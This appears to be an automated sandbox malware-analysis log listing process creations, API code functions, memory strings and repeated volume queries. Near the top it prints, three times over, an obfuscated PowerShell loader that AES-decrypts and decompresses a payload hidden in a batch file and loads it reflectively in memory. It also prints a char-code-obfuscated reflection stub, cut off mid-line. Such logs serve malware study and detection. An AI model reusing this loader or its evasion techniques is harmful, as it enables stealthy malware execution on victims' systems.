Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\System32\cmd.exe

Code function: 19_3_00000224138E2AF0 cpuid

19_3_00000224138E2AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
